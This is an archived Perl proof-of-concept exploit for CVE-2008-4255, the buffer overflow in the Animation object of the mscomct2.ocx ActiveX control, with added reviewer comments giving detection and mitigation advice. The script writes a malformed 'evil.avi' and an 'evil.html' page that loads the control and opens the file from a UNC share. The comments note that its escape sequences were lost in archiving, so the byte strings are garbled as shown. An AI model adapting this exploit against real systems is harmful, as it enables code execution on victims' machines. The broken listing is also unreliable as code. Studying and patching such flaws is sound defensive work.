# Title : MS Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC
# Published : 2008-12-12
# Author : Jerome Athias
#!/usr/bin/perl
# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC
# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx
# /JA
# Come to FRHACK!
# www.frhack.org
# Review summary: this script takes no input. It prints progress messages and
# writes two files, evil.avi and evil.html, into the current directory.
# NOTE(review): the backslashes of the escape sequences appear to have been
# lost when this page was archived (the trailing "n" of each message, the
# "x52x49..." header text, the UNC path in the HTML). As shown, these literals
# are emitted as plain text.
# For defenders: the header comment names CVE-2008-4255 in the Animation object
# of mscomct2.ocx. Apply the vendor update for that CVE, or set the ActiveX
# kill bit for the CLSID used below on hosts that do not need the control.
print "nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoCn";
print "Generating malicious .AVI filen";
print "This file should be served via an UNC pathn";
print "[->] Building evil.avin";
# Assigned but never read anywhere in this listing.
my $shellcode = "http://metasploit.com";
# $FileHeader is a package global (no `my`; the listing has no `use strict`).
# Read as hex, the text spells a RIFF signature, the form type "AVI " and two
# chunk tags, "strh" and "strf". The listing holds 64 such values in total,
# while the size fields it declares (0x082C for the container, 0x0800 for
# "strf") are much larger.
# NOTE(review): presumably that size mismatch is what the control mishandles;
# the page does not say, so confirm against the vendor advisory.
$FileHeader =
"x52x49x46x46x2Cx08x00x00x41x56x49x20x73x74x72x68x10x00x00x00x76x69x64x73x20x20x20x20x00x00x00x00".
"x00x00x00x00x73x74x72x66x00x08x00x00x28x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
# Two-argument open with the mode embedded in the string. The return value is
# not checked, so a failed open goes unnoticed and the print below is then made
# on a handle that was never opened.
open(my $poc, "> evil.avi");
print $poc $FileHeader;
close($poc);
print "[->] evil.avi generatedn";
print "[->] Building evil.htmln";
# HTML page that instantiates the control by classid with AutoPlay set to True,
# then calls Open() on it from script with a UNC path. The address and share
# name are presumably the author's placeholders.
# Detection: markup that pairs this classid with an Open() call on a remote path.
# Mitigation: blocking outbound SMB at the perimeter keeps a browser from
# fetching such a path from an external host.
$EvilHTML =
"<html><head></head><body><object id='evil' classid='clsid:B09DE715-87C1-11D1-8BE3-0000F8754DA1'><param name='AutoPlay' value='True'></object>".
"<script language=javascript>evil.Open('\\192.168.0.1\share\evil.avi');</script></body></html>";
# Second `my $poc` in the same scope; it masks the first declaration. Perl only
# reports that under `use warnings`, which this listing does not enable.
# The open is again two-argument and unchecked.
open(my $poc, "> evil.html");
print $poc $EvilHTML;
close($poc);
print "[->] evil.html generatedn";